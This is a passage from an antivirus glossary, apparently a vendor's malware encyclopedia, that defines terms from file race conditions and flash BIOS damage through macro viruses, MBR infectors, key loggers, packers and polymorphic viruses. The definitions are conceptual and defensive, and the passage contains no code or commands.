Some applications store information in unsecured files and folders like the temp directory. A file race condition occurs where an attacker has the chance to modify these files before the original application has finished with them. If the attacker successfully monitors, attacks and edits these temp files the original application will then process them as if they were legitimate. The name of this kind of attack is from the attackers 'race to edit the file'. <br />
File System Virus<br />
<br />
A synonym for cluster virus. <br />
Firewall Killer<br />
<br />
Any hacker tool intended to disable a user's personal firewall. Some will also disable resident anti-virus software.<br />
Flash Memory <br />
<br />
Flash memory became of interest to antivirus researchers when the full measure of CIH's payload was decoded. Because the BIOS of most Pentium-class and later PCs is shipped on a flash memory chip and most mainboard and system designs result in write-mode for that memory being readily enabled, the BIOS of a PC can no longer be considered 'carved in stone'. <br />
Fortunately, some BIOSes are write-protected, requiring special measures be taken to allow flash write enabling to be activated (such as opening the case and setting jumpers or switches). However, testing reveals in many systems that appear to have such a feature, it often does not work. To date, viruses that attempt to re-flash a victim's BIOS and 'succeed' (in that the contents of the BIOS change) all result in the 'trashing' of the BIOS, rendering the victim machine unbootable. That is, unbootable as in you cannot put a special recovery diskette in the floppy, bootup and run a program to re-flash a good copy of the BIOS program back into the flash memory chip. That is, unbootable as in all that happens is the power supply and CPU cooling fans, and the hard drives, spin up because that's what they do when power is applied. Specialist equipment is needed to re-program the flash chip once it is removed from the mainboard, and as more mainboard designs move to surface-mount flash chips rather than socketed ones, that option is not available for an increasing number of machines. <br />
Flooder<br />
<br />
A program that overloads a connection by any mechanism, such as fast pinging, causing a DoS attack.<br />
FTP Server<br />
<br />
When installed without user awareness, an FTP server allows an attacker to download any file in the user's machine, to upload new files to that machine, and to replace any existing file with an uploaded file.<br />
Return to top<br />
<br />
<br />
G <br />
<br />
Generator Kit<br />
See Constructor Kit. <br />
Germ <br />
A first generation sample of a virus. Technically, the term is reserved for forms of the virus that are in some way 'special', such that another sample the same as the one being referred to could not be produced as the result of a normal infection event. Examples include the initial, unencrypted form of encrypted or polymorphic viruses and 'virus code only' samples of simple prependers and appenders, as would be produced by compiling their source code. Germ samples are infective but not themselves the result of a natural infection incident. <br />
Ghost Positive <br />
<br />
This is a specific form of false positive, in which the error is due to 'leftover pieces' or 'remnants' of a virus that are incorrectly detected and reported as an infection. As the virus is not present, no longer present (in the sense that it cannot be activated through normal actions of the user or system), or present but inactive, it is erroneous for a scanner to report an (active) infection. (Usually only part of the virus will be present anyway.) <br />
For example, under DOS or Windows, accessing a diskette to obtain a listing of its root directory causes the diskette's system boot sector to be read because details from the BPB must be obtained to correctly access the rest of the disk's contents. Imagine a diskette that had previously been infected with a boot virus and disinfected by writing a very short boot program that simply displays a message warning the diskette is not a functional system diskette. Such a short program could easily leave a couple of hundred bytes of the virus' boot sector code intact if the disinfecting program did not overwrite the rest of the boot sector. Some scanners may see this part of the virus' code and consequently report the virus' presence. (See also Slack Space.) <br />
In the early days of scanner development, some scanners would false alarm on other scanners, or report viruses in memory after another scanner had run. This was usually a form of ghost positive caused by one scanner 'seeing' the scan strings of another scanner. The simple solution to this was to not store scan strings in plain text, but to cipher them in some way. Of course, once this was done, the scanner had to work with them ciphered, as deciphering them even just in memory could still lead to their detection in-memory on a subsequent scanning run. <br />
Global Template<br />
<br />
Although many applications have mechanisms for their users to extend the default functionality and/or appearance of the application, some allow this (partially) via template files. Originally used as a means to provide standard document, spreadsheet, etc formatting, the template files of some applications (like the document files on which they are based) have been extended to hold all manner of customizations (such as keyboard shortcuts and personalized menu layouts) and macros (that add functionality by automating routine processes and the like). Some products, such as Word and Excel, have gone a couple of steps further and provide for one or more specially named template files and/or directories to be automatically loaded as the application starts up and also allow 'Add-In' functionality to be implemented in templates. <br />
For example, Word for Windows looks for the file 'Normal.dot' in certain directories (while the Macintosh version looks for a file of Word Template type named 'Normal' in matching folders) and loads it into its environment without warning. Should a normal template contain any auto macros that should run when such a template is loaded, they are run, any menu or shortcut customizations it contains are applied, and any system macros or standard event handler macros in the template will become active, running when the corresponding Word command or event occurs. Word and Excel both support a 'startup' directory, although in slightly different ways. Word will open and integrate any template files stored in its startup directory into its runtime environment, just as it integrates the contents of the normal template. Excel opens and integrates any standard Excel file type stored in its startup directory into its runtime environment. Registered Add-Ins are also loaded when the application starts and if they are templates, will be loaded from wherever they are registered. Thus, for Word, the normal template, any templates in its startup folder and any Add-Ins loaded as templates are all 'global templates', with any customizations and macros they contain becoming available throughout the Word environment. <br />
Infection of global templates is thus an attractive proposition to macro viruses written for such application environments, as it provides a simple form of 'residency'. This will improve its likelihood of infecting more documents and thus improve its chances to spread. <br />
The term 'global template' is also often, but incorrectly, used to mean 'Word's normal template'. This is almost certainly a carryover from earlier versions of Word's macro language, where the normal template could often be referred to via the referent 'Global:', rather than by its full path and name. Even in many of those versions of Word, this usage was, at best, sloppy because of the possibility (if not the actuality) of other 'global' templates. <br />
Globbing<br />
<br />
Globbing is the use of wildcard characters or arguments to greatly increase the amount of data requested. An example is Dir *.* in DOS, this command is asking for all file names with all file extensions (everything) in the current directory. By making globbing requests to a web server it is sometimes possible to cause a Denial of Service attack as the the server is too busy to deal with legitimate requests. <br />
Goat File <br />
1. Some generic approaches to virus detection create 'dummy' program files which are written to the drives of the machines being monitored. These files are regularly checked for modification, or created, checked and then deleted. Such files are sometimes called 'goat files', 'decoy files' or 'bait files' because they are not intended to be run for any practicable purpose, and act solely as 'bait' to trap and detect the presence of an active virus. <br />
2. Goat file is also widely used to refer to the 'standard' files antivirus researchers commonly use to replicate viruses onto. Such files can make it easier to analyze the virus, because the researchers know what parts of the infected files they are dealing with are part of the original 'goats', and thus can readily ignore that code during their analysis of the virus. Different researchers generally use different goats. <br />
Return to top<br />
<br />
<br />
H <br />
<br />
Hardware Damage<br />
<br />
There has been much debate about whether viruses, or any other software, can cause physical harm or 'damage' to computer hardware. Most claims that such is possible turn out to be one of three kinds - appeals to ancient and usually badly documented stories of hardware destroyed by software shenanigans, accelerated wear and tear, and misunderstanding the difference between damaging hardware and trashing software stored in some form of (semi-)permanent storage. Dealing with each briefly... <br />
There are several reports of ancient hard drives that (reputedly) had no sanity checking in their control mechanisms. The usual claim is that such drives could be taken out of service (even 'destroyed') by directing the drive to seek for a cylinder (track) past the last physical cylinder location. Stories also persist about early PC monitors that could have internal electronic components 'fried' (even setting the monitor on fire if left long enough) by programming the display adapter to use out of specification frequencies for the monitor. A variation on the latter is the 'blow up a monitor by stopping the guns from scanning so they bombard a continuous beam at one tightly focussed spot' claim. <br />
Similar stories and speculation exist about 'overusing' a device. These include claims that certain (usually unspecified and ancient) monitors could be damaged by various means or rendered 'practically unusable' via accelerated phosphor burn and the like. Notions of wearing disks out quickly by repeatedly seeking back and forward between the very first and last cylinders and repeatedly updating the contents of CMOS RAM or EEPROMs or Flash memory are also common. <br />
These first two kinds of stories are pretty much relegated to the scrap heaps of history now, but another type of claim has recently had quite an airing. The CIH virus renders a PC unusable by re-flashing the flash memory chip holding the BIOS. The routine in CIH effectively trashes the BIOS. However, although it leaves the machine unusable (and often leaves the mainboard effectively irreparable) this is not an example of software damaging hardware. The hardware is all still fully functional, but just happens to be built into a bad design that prevents the (economical) return of the system to a working state. For the user faced with a mainboard replacement because a virus payload triggered, this may seem like splitting hairs, but there is a clear technical distinction between the CIH virus rendering a poorly designed system board irreparable and software damaging hardware. <br />
Heuristic Detection<br />
Apart from precise identification of known viruses, scanners can (and do) employ various forms of less-precise detection. The essential idea behind such heuristic detection mechanisms is to relax the detection rules somewhat, detecting code that is almost bound to be indicative of virus infection (or other forms of malware functionality) and at the same time very unlikely to be seen in 'innocent' programs. <br />
For example, various kinds of unusual settings in the headers of PE (Windows 32-bit executable) files may be strongly indicative of virus-related 'tampering'. If it is also known that such 'odd' headers are never produced by any PE compiler/linker combinations, detecting such things and flagging the files to the user as 'suspicious' may be a good heuristic for detecting certain kinds of new PE infecting virus that the scanner does not yet detect as a known virus. <br />
Similarly, code analysis of a VBA macro can, in most cases, quickly and reliably determine whether the macro has code that copies itself to other documents and templates. However, that alone is not sufficient as a macro virus heuristic as it is common for legitimate macro programs to have installation routines that are themselves macros that copy other macros around. The designer of a good heuristic macro virus detector will attempt to prevent raising false positive alarms on such macro installation packages by requiring the heuristic detector to find more than just code that copies a macro to a global template (the usual installation location for such macro programs). Careful tuning of the importance (or 'weight') attached to various virus-like features can greatly reduce the rate of such false positives. An approach that combines positive and negative heuristics is generally considered best. A positive heuristic is a programmatic feature the scanner considers increases the likelihood it is looking at a virus and a negative heuristic is a feature that reduces that likelihood. <br />
Often scanners that include heuristic detection capabilities have these disabled by default. This can be because they add extra overhead to the scanning process, but it can also be because the heuristics are fairly 'liberal'. Particularly in the latter case, you should only enable the scanner's heuristic detection if a new virus is suspected, as it's results may further focus your attention on the likely affected files. Heuristics should also be enabled and set to their highest levels on e-mail gateway scanners and other 'interception points' if there is an unavoidable business need to allow infectible file types into an organization. Some scanners with heuristic detection abilities allow the user to set the 'sensitivity' of the heuristics and again, these should be set to highest sensitivity for e-mail gateway scanners. <br />
Heuristics<br />
<br />
Heuristics means 'rule based'. Normally, for an Anti-Virus product to detect a virus, the virus must have been seen before, analyzed and detection added to the signature update files. Heuristics are used as there are some families of viruses that continually change their appearance and it is not possible to detect every variant. Heuristics allow us to set up some rules so if it smells like a virus, and it acts like a virus we can detect it, even if we have never seen the virus before.<br />
Hijacker<br />
<br />
Any software that resets your browser's settings to point to other sites. Hijacks may reroute your info and address requests through an unseen site, capturing that info. In such hijacks, your browser may behave normally, but be slower.<br />
Hoax<br />
<br />
A hoax is a message, typically distributed via E-mail or newsgroups, which is written to deliberately spread fear, uncertainty and doubt. Just like the viruses they purport to describe, they are sent from user to user/s, slowing network and Internet traffic and causing damage 'per se', by wasting users time and by prompting well meaning, (albeit unnecessary) clean up procedures. These messages may be regarding completely fictitious viruses and trojans, or they may be misleadingly warning users about legitimate programs (a common target of past hoaxes was screensavers and more recently, Windows utilities). Hoaxes prey on the lack of technical knowledge and the goodwill of all those that receive a hoax. Generally, hoaxes are warnings about threats to your computer. They tend to follow a standard pattern, and should you receive an e-mail that contains the following characteristics, view it with doubt, if not downright suspicion. <br />
• Reports of a virus that can do massive damage to your pc - many even going so far as to say that critical hardware will be destroyed. <br />
• May sound unnecessarily technical (although often meaningless), thus taking advantage of many users fears of technology/the unknown. <br />
• May quote bogus announcements from Antivirus Industry experts, some even going so far as to provide a correct link to an AV site (which strangely enough, if visited, will most likely tell you that it's a hoax). <br />
• The message may be written in emotive language. That is, the message may be colored with upper case text and contain large numbers of exclamation marks (in order to emphasize the severity of the perceived threat and make the user more likely to forward the message). <br />
• Asks that you forward the message to as many people as possible. This is the most obvious line in a hoax. Warnings from reputable expert sources do not ask you to forward their notifications. It is this part of the text of the message in particular, that should immediately make wary users skeptical.<br />
Homepage Hijacker<br />
<br />
Any software that changes your browser's home page to some other site. Hijacks may reroute your info and address requests through an unseen site, capturing that info. In such hijacks, your browser may behave normally, but be slower.<br />
Hostile ActiveX<br />
<br />
An ActiveX control is essentially a Windows program that can be distributed from a web page. These controls can do literally anything a Windows program can do. A Hostile ActiveX program does something that its user did not intend for it to do, such as erasing a hard drive, dropping a virus or trojan into your machine, or scanning your drive for tax records or documents. As with other Trojans, a Hostile ActiveX control will normally appear to have some other function than what it actually has.<br />
Hostile Java<br />
<br />
Browsers include a ""virtual machine"" that encapsulates the Java program and prevents it from accessing your local machine. The theory behind this is that a Java ""applet"" is really content -- like graphics -- rather than full application software. However, as of July, 2000, all known browsers have had bugs in their Java virtual machines that would allow hostile applets to ""break out"" of this ""sandbox"" and access other parts of the system. Most security experts browse with Java disabled on their computers, or encapsulate it with further sandboxes/virtual-machines.<br />
Hostile Script<br />
<br />
A script is a text file with a .VBS, .WSH, .JS, .HTA, .JSE, .VBE extension that is executed by Microsoft WScript or Microsoft Scripting Host Application, interpreting the instructions in the script and acting on them. A hostile script performs unwanted actions.<br />
HTTP Server<br />
<br />
When installed without user awareness, an HTTP server allows an attacker to use a web browser to view and thus retrieve information collected by other software placed in the user's machine.<br />
Return to top<br />
<br />
<br />
I <br />
<br />
Immediate Acting <br />
Usually of payloads; code that runs when the virus or Trojan carrying it first runs. For example, one of the reasons the mass mailing viruses W97M/Melissa and VBS/LoveLetter spread so far and so fast was because their mass mailing code runs the first time the virus' macro (Melissa) or script (LoveLetter) is run. Whether that functionality is disabled so as to not execute on subsequent runs of the virus or Trojan is immaterial. (c.f. Logic Bomb)<br />
Impact<br />
The extent to which an attacker may gain access to a system and the severity of it on the organization. For example:<br />
• 1, 2, 3 Info Gathering:<br />
Little or no chance of an attacker gaining access to a system<br />
• 4, 5, 6, 7 User Access:<br />
Attackers can gain limited user or network level access<br />
• 8, 9, 10 Privileged access or Denial of Service:<br />
Attackers can gain root or superuser access or severely impact system operation.<br />
In the Field <br />
<br />
Sometimes viruses are said to be 'in the field' or 'reported from the field'. This may be loose usage of the term, or it may be to draw the distinction between viruses that have been seen in a small number of real-world infection incidents ('in the field') and those that have reached the top half of the WildList ('in the wild'; see next item). <br />
IRC War<br />
<br />
Any tool that uses Internet Relay Chat for spoofing, eavesdropping, sniffing, spamming, breaking passwords, harassment, fraud, forgery, 'imposturing', electronic trespassing, tampering, hacking, nuking, system contamination including without limitation use of viruses, worms and Trojan horses causing unauthorized, damaging or harmful access and/or retrieval of information and data on your computer and other forms of activity that may even be considered unlawful.<br />
ITW, ItW<br />
<br />
In the Wild. <br />
Return to top<br />
<br />
<br />
J <br />
<br />
Joiner <br />
<br />
Loosely a joiner is a program that takes two or more files and 'sticks them together'. In antivirus and malware circles it is typically used in reference to utilities that join two or more files together with one or more of these being executables. The joiner itself supplies a 'stub' - a small executable that actually gains control when the resulting executable file is run. The stub breaks the two (or more) original files off either into predestined files or temporary files and performs various actions with them, as defined by the person who joined the files together. For example, if two executables were joined, each may be run with one of them set to do so in a hidden window so its presence is not obvious to the user (victim) of the joined file. Joiners are particularly popular with the mass spreaders of common remote access Trojans, where a successful ploy has been joining a small harmless joke or fun program or popular utility with the server installer of a RAT. <br />
Joke Program<br />
There is no firm definition of a joke program, but, there are many programs about that are so classified. In general, they aim to entertain either the recipient or the supplier of the program, although it is probably the case that the joke is usually at the expense of the recipient. Human nature seems to turn many of these recipients into senders though, once they realize the program did no obvious harm beyond briefly increasing their personal anxiety levels (which was, in fact, the purpose of the person who sent the program to them). <br />
So, what is a joke program? Joke programs are usually seen as programs that do no real damage but in some way attempt to raise the program user's concern for the contents of their computer. A classic example is a program that suggests the user's hard drive is about to be reformatted unless they click the 'Cancel' button in time and then starts a ten-second countdown - when the user tries to click the 'Cancel' button, the button jumps away from the cursor. If left to run until the countdown completes, a message is displayed explaining that it was dangerous to run a program sent via e-mail. Although such programs do not perpetrate any direct harm against the user, they can represent a serious risk. The problem that many such 'harmless' joke programs introduce is that some users panic and, decide that rather than risking the loss of their files, they would be better off turning their machine off. In so doing, they will lose any unsaved changes to current work and may corrupt the file system on their machine, causing even greater losses. <br />
Return to top<br />
<br />
<br />
K <br />
<br />
Key Generator<br />
<br />
Any tool designed to break software copy protection by extracting internally-stored keys, which can then be entered into the program to convince it that the user is an authorized purchaser.<br />
Key Logger (1)<br />
<br />
A variant of the Key Logger that captures passwords as they are entered or transmitted. Some password capture trojans impersonate the login prompt, asking the user to provide their password.<br />
Key Logger (2)<br />
<br />
Any program that records keystrokes is, technically, a key logger. The term tends to be used in malware circles for programs that surreptitiously record keystrokes and then make the log of keyboard activity available to someone other than the logged user(s). Commonly these log files are e-mailed to the person who planted the logging software, but on public access machines (in cyber-cafes, school and university computer labs, etc) that level of sophistication is not necessary as the 'attacker' can simply access the log file from the compromised machine at a later date, revealing usernames and passwords for accessing other systems and other potentially sensitive information. Although more common in Trojan Horse programs and remote access Trojans, key loggers are sometimes used in the payloads of viruses. <br />
Return to top<br />
<br />
<br />
L <br />
<br />
Link Virus <br />
<br />
A synonym for cluster virus which should not be used to avoid confusion with the use of the term 'link virus' to mean file infectors on Amiga computers. <br />
Loader<br />
<br />
Any program designed to load another program.<br />
Logic Bomb<br />
Usually of payloads; code that only runs when particular logical conditions are met while executing the virus or Trojan carrying it. For example, many viruses have payloads that only run on a certain date or between two dates or times, whereas others have payloads that only run after a specific number of files or boot sectors have been infected, and yet others check for any number and manner of other conditions. <br />
<br />
Logic bombs that depend on date, time or elapsed time triggers are often called time bombs. Those that will normally run when a virus or Trojan first executes are referred to as immediate acting. <br />
Return to top<br />
<br />
<br />
M <br />
<br />
Macro Virus <br />
Macro viruses consist of instructions in Word Basic, Visual Basic for Applications and other application macro languages. They often reside in documents or other file types that are traditionally thought of as 'just data', and although that is not critical to determining whether something is a macro virus or not, it has been a crucial factor in the relative success of certain kinds of macro viruses. Another factor contributing to the success of macro viruses in the popular Microsoft Office application suite and related products (such as Microsoft Project) is that not only can the document files of these applications carry macro code, those macros can automatically run when certain basic events (such as opening and closing documents) occur and/or when the user expects that standard functions within the application should occur (such as selecting the Save item from the File menu). <br />
While few users tend to think of 'documents' as capable of being infected, any application which supports document-bound macros that automatically execute or usurp standard application functions is a potentially welcoming platform for macro viruses. By the late 1990s, documents had become much more widely shared than diskettes (assisted by the extensive adoption of networking technologies and particularly Internet e-mail) and document-based viruses dominated prevalence statistics. This seems likely to continue for the early years of the 21st century. <br />
Mail Bomber<br />
<br />
Software that will flood a victim's inbox with hundreds or thousands of pieces of mail. Such mail generally does not correctly reveal its source.<br />
Mailer<br />
<br />
A program that creates and sends email with forged headers, so that the source of the mail it sends cannot be traced.<br />
Malware <br />
Malicious software. <br />
A catch-all term for 'programs that do bad or unwanted things'. Generally, viruses, worms and Trojans will all be classed as malware, but several other types of programs may also be included under the term. One example of a good use for the term is where the best classification of a program as a worm or a virus may be unclear, you could still refer to it as 'a piece of malware'. <br />
Mass Mailer <br />
A virus that distributes itself via e-mail to multiple addressees at once is known as a mass mailer. Probably the first mass mailer was the CHRISTMA EXEC worm of December 1987 (and a couple of copycats in succeeding years), but the technique then all but disappeared until the Melissa outbreak of 1999. There have, however, been many mass mailers since Melissa. <br />
An important distinction between mass mailers and slow mailers, at least in terms of threat assessment, is the scale or rate at which they send infective messages. In sending a large number of messages (and hence copies of themselves) at once, mass mailers aim to achieve rapid, widespread distribution. Presumably their writers hope enough recipients of these messages will be lulled into running the attachments (or simply opening the messages in the case of HTML-embedded script viruses) to ensure the virus' distribution outstrips spread of news about the outbreak and/or updates to virus scanners and other countermeasures. With the apparently ever-growing number of people on the Internet through the late 1990s, there was a continuous supply of fresh, very naïve, inexperienced users to be fooled into double-clicking what they should not. Through the use of 'obvious' social engineering tricks, viruses such as VBS/VBSWG.J had a fair shot at their fifteen minutes of fame. <br />
Mass mailers often have the '@mm' suffix to their names, making the additional threat they may pose readily identifiable to the informed (although Computer Associates do not generally use this naming convention). Mass mailers are often referred to as 'worms', but this usage is not entirely accepted, and as 'e-mail worms' (perhaps to distinguish them from 'real worms'). <br />
Master Boot Record <br />
The boot sector at the beginning of a hard drive (sector location 0,0,1 in CHS notation) is known as the master boot sector or, more commonly, the master boot record. Boot code in this disk sector is loaded by the BIOS, should it attempt to boot from the hard drive. Normally, the MBR's boot code checks the MBR's partition table to determine which partition to load an OS from. It then loads the contents of the boot partition's system boot sector (the first sector in the partition) and transfers control to that load location. This should be the beginning of the boot code of that partition and it is up to that code to 'know' how to boot the OS on that partition. <br />
The master boot record is usually referred to as such or as the MBR, sometimes as the master boot sector (or MBS) and occasionally, but incorrectly, as the partition table (which is actually just a part of the contents of the MBR). Normally the master boot record of a DOS or Windows machine is created when partitioning the drive with FDISK, although all manner of third-party partitioning and boot management tools may also write to the partition table and/or the MBR's boot code. <br />
Because the MBR contains a program (the boot code) it can be infected by a suitably crafted virus. The details of this are covered in more detail in the Boot Sector Infector item. <br />
Master Boot Record Infector <br />
A virus that infects master boot records. In reality, a virus that only infected MBRs would not be very successful because its chances of replicating would be very limited as new hard drives are seldom added to systems. Its chances of spreading would be even more limited as it is even rarer for hard drives to be moved from machine to machine. MBR infectors usually also infect other boot sectors (particularly those on diskettes) or are multipartite, infecting program files and MBRs (and possibly other boot sectors as well). For a detailed consideration of general boot sector infection issues, see the Boot Sector Infector item. <br />
Master Boot Sector <br />
<br />
See Master Boot Record. <br />
MBR <br />
Master Boot Record. <br />
MBS <br />
<br />
Master Boot Sector - a synonym for Master Boot Record. <br />
Middle Infector <br />
<br />
This is not a widely used term, but generally refers to an entry point obscuring (EPO) virus. Due to design considerations in some scanners, some non-EPO viruses are referred to as middle infectors and may require special handling. <br />
Misc<br />
<br />
Anything (other than a document) not in another category, perhaps because it falls into mulitple categories, such as a tool suite.<br />
Multipartite Virus<br />
A virus that infects two or more different target types is generally referred to as a multipartite virus. Early multipartite viruses infected boot sectors and DOS executables, but more esoteric combinations have been seen. <br />
Multiple Cavity Infector <br />
<br />
An extension of the cavity infection technique, a multiple cavity infector is able to break its code into two or more pieces, placing each piece in a suitable-sized 'hole' in the infection target. As with the standard cavity infection technique, this has the advantage of not increasing the size of the target, but adds the flexibility of infecting files that do not have a single 'hole' large enough for the virus' entire code. This is a very rare infection technique and made famous by the first multiple cavity virus - CIH (although Commander_Bomber can lay claim to using much the same technique, it made its own cavities, moving pieces of the original executable image around to accommodate slivers of its code). <br />
Mutex<br />
<br />
MUTual EXclusion object. Mutex is a program object that allows multiple threads to share the same resource. Any thread that needs the resource must lock the mutex from other threads while it is using the resource. The mutex is unlocked when it is no longer needed or the thread is terminated. The difference between mutex and semaphore is that a mutex is owned by the thread which locked it (that is, only the process which locked the mutex can unlock it). Whereas a semaphore can be changed by another thread or process. <br />
Return to top<br />
<br />
<br />
N <br />
<br />
Network Creeper <br />
Viruses that spread to new hosts by finding writable network drives (or 'shares') and copying themselves there or infecting files on those shares are sometimes referred to as network creepers. Note that a distinction is made between network creepers and other viruses that just happen to infect files on network shares because they infect files on all local and mapped drives. To be a network creeper, a virus has to specifically search for shared network resources, and will find ones that are not currently in use by its host machine. VBS/Netlog has shown how surprisingly successful this technique can be when depending solely on Microsoft Networking and open shares (ones with write-access but no password). <br />
Some antivirus researchers consider network creepers to be worms <br />
Notifier<br />
<br />
Any tool designed for stealth notification of an attacker that a victim has installed and run some pest. Such notification might be done by FTP, SMS, SMTP, or other method, and might contain a variety of information. Often used in combination with a Packer, a Binder and a Downloader.<br />
Nuker <br />
Now a generic term for several TCP/IP DoS attacks, but originally made (in)famous by the WinNuke DoS attack which crashed Windows machines that had not been suitably patched or firewalled. <br />
Return to top<br />
<br />
<br />
O <br />
<br />
Oligomorphic Virus<br />
An encrypted virus that has several forms of its decryption code, selecting between them (usually randomly) when writing its decryptor to a new replicant. (See Polymorphic Virus for more details.) , <br />
Overwriter <br />
In general, the simplest form of virus is a program that just copies itself over the top of other programs. Such viruses are known as overwriters and are commonly the first types of viruses written for newly 'virused' platforms (e.g. Phage, the first PalmOS virus, discovered in late 2000, was a simple overwriter). Because they do not preserve the functionality of their host programs, overwriters tend to be very obvious and thus not very 'successful'. (c.f. Parasitic Virus) <br />
Return to top<br />
<br />
<br />
P <br />
<br />
P2P<br />
<br />
Any peer-to-peer file swapping program, such as Audiogalaxy, Bearshare, Blubster, E-Mule, Gnucleus, Grokster, Imesh, KaZaa, KaZaa Lite, Limewire, Morpheus, Shareaza, WinMX and Xolox. In an organization, can degrade network performance and consume vast amounts of storage. May create security issues as outsiders are granted access to internal files. Often bundled with Adware or Spyware.<br />
Packer<br />
<br />
A utility which compresses a file, encrypting it in the process. It adds a header that automatically expands the file in memory, when it is executed, and then transfers control to that file. Some packers can unpack without starting the packed file. Packers are ""useful"" for trojan authors as they make their work undetectable by anti-virus products.<br />
Parasitic Virus <br />
Parasitic viruses are those that modify some existing code resource to effect replication. The major distinction here is that companion viruses are not parasitic, and the standalone 'worms' (such the mass mailers and network creepers) tend not to be parasitic. Overwriters tend not to be considered parasitic either. Although macro virus infection necessitates the modification of document files, it has been common for macro viruses to remove pre-existing macros, making them more akin to overwriters. Thus, usually only those macro viruses with a replication method that retains (some of) the pre-existing macros from a target are considered parasitic. Some researchers consider such viruses parasitic only if macros within a module used by the virus are retained. <br />
Partition Boot Sector <br />
A confusing term, at best. It seems to mainly be used to mean the system boot sector of the active partition. Unfortunately, without some additional context, it seems likely this term would easily be mistaken to be a reference to the master boot sector because this houses the partition table. <br />
Partition Table<br />
<br />
Partition tables are a crucial part of how DOS and related operating systems understand the layout of partitions (or logical drives) on hard disks. For the sake of interoperability, most OSes that run on PCs also follow the dictates of these fundamental partition information resources. <br />
A partition table is a 64 byte data array located at offset 1BEh of master boot records and the boot sectors of extended partitions. Each table has space for only four 16 byte partition definition entries. Each such entry records such data as the beginning and ending sector of the partition, a partition type indicator byte and whether the partition is marked 'active' (or 'bootable'). Beginning and ending sector locations are recorded in absolute CHS terms (relative to any drive geometry translation the BIOS may be set to use). <br />
As the partition table, per se, is just data it cannot be infected. Occasionally the term 'partition virus' or 'partition table virus' is seen or heard. It is a misconception and what is meant is usually a boot virus that infects MBRs. <br />
Password Cracker<br />
<br />
A tool to decrypt a password or password file. PestPatrol uses the term both for programs that take an algorithmic approach to cracking, as well as those that use brute force with a password cracking word list. Password crackers have legitimate uses by security administrators, who want to find weak passwords in order to change them and improve system security.<br />
Password Cracking Word List<br />
<br />
A list of words that a brute force password cracker can use to muscle its way into a system.<br />
Payload <br />
<br />
If a virus has any damaging routines (other than apparently unintended side-effects or bugs), they are known as payloads or warheads. The term is drawn by analogy with military rocket and munitions talk, where the virus is seen as the 'delivery vehicle' and the damage routine the payload or warhead. We also borrow the term trigger from this analogy. <br />
Pervasiveness<br />
Pervasiveness refers to a virus' potential to spread. Hence, a worm that has the ability to send itself out to a large number of victims is given a high pervasiveness rating, while a boot sector virus that spreads via 'sneakernet' (i.e. - by the manual sharing of floppy disks), is given a low pervasiveness rating. Varying pervasiveness ratings are often allocated to specific types of malware. CA uses this metric to measure a malware's potential to spread to other computers. This metric is given the second highest weight, in combination with Wild and Destructiveness metric, to calculate the overall threat assessment.<br />
<br />
There are four levels of pervasiveness that can be allocated to a virus in the Encyclopedia:<br />
• None <br />
• Low <br />
• Medium <br />
• High <br />
None<br />
This rating is given to trojans, hoaxes and in some cases, viruses that may not function as intended (and fail to replicate). Trojans and hoaxes must be maliciously or otherwise sent to potential victims. They do not have the ability to self-replicate; and generally appear in the encyclopedia with a pervasiveness rating of 'N/A' (i.e. - this characteristic is not applicable). Examples include Win32.Butano, W97M/MadCow.A:intended and the Good Times hoax.<br />
Please Note: 'N/A' may also used in encyclopedia entries where a virus' pervasiveness rating is unavailable. <br />
Low <br />
This rating is often given to 'traditional viruses'. This type encompasses the majority of macro viruses and boot sector viruses. These viruses have the capacity to replicate by themselves and require no further human intervention to spread from file to file in an infected PC. However, in order to spread from PC to PC, they hide in floppy disk boot sectors and office files such as documents and spreadsheets that may be shared among users. The limitation that they must be manually sent out or shared in order to infect other PCs, means that they will generally be given a 'low' pervasiveness rating. Examples of such viruses include W97M/Bablas.A, WM/Concept.A and Michelangelo.<br />
Medium <br />
This rating is given to viruses, such as mailers (or slow mailers) that use one or more of the following techniques for distribution:<br />
• Send only one 'infected' message at a time <br />
• Occasionally send small batches of infected messages (for example, sends itself out to the first 10 addresses in the Microsoft Outlook address book) <br />
• The virus may have the capacity to spread out to many users, but utilizes a very specific channel (such as IRC) which will limit its potential for distribution <br />
• Runs its distribution mechanism only once (as opposed to, say, each time the PC is started) <br />
• Has the ability to spread to large numbers of users at one time, but the infection process is so obvious to even the most naïve of users, that it will rarely run without being interrupted <br />
Examples include Win32.Funso, Win32.SQL and Win32.Annoying.<br />
High <br />
This rating is given to viruses that can distribute themselves with either great speed or, from a virus writer's perspective- success. This category of pervasiveness is often given to worms and mass-mailing viruses. Malware with a high pervasiveness rating often use one or more of the following techniques:<br />
• Utilizes more than one method of distribution (say by sending itself to all addresses in the Outlook address book, and by spreading through open network shares) <br />
• Performs its distribution process repeatedly (every time the PC is rebooted or at a specific time every day) <br />
• Performs its distribution process in a way that is completely hidden from the user and therefore more likely to run repeatedly without being detected <br />
• Uses 'social engineering' tricks successfully to prompt users to run infected attachments <br />
• Exploits either one or more vulnerabilities in widely distributed software applications (for example - Microsoft Windows) <br />
Phreaking Tool<br />
<br />
Any executable that assists in hacking the phone system, such as by using a sound card to imitate various audible tones.<br />
POC <br />
See Proof of Concept. <br />
Polymorphic Virus<br />
In a sense, polymorphic viruses were an extension of the simpler idea of encrypted viruses. Although the replicants of encrypted viruses vary, they can still be detected (albeit imprecisely identified) by simple string scanning because they have a constant decryptor. The development of polymorphism was an attempt to overcome that shortcoming of encrypted viruses. <br />
The simplest approach to not having a constant decryptor was for the virus writer to produce several implementations of the decryption algorithm and slot just one of those forms into the small unencrypted area of each replicant. A very similar method was to have several different encryptor/decryptor pairs, randomly selecting among them at infection time. The very simplest form of this approach employs just two forms of the decryption code or two encryption/decryption pairs and thus is sometimes referred to as bimorphism. More complex variations on this approach involve more than two forms, but still a number fixed by the fact that the code for each decryptor or encrypt/decryptor pair is present in the virus' code. Whale was the first example of this approach, carrying 30 encryptor/decryptor pairs in its code. Aside from adding some overhead to analyzing the virus, such approaches were still not difficult for scanners to deal with - all the scanner developers had to do was add a scan string for each decryptor. <br />
True polymorphism, however, requires more complexity than simply selecting from a group of constant encryptor/decryptor pairs. Viruses in the V2Px family were the first truly polymorphic viruses, employing such techniques as inserting a variable number of 'do nothing' or 'noise' instructions between the 'viral' instructions, interchanging equivalent but different instructions, and swapping code blocks where the order of execution of the blocks was not important to the overall effect of the code. Such code permutations could be applied to all of a virus' code or just to the decryption routine of an encrypting virus. <br />
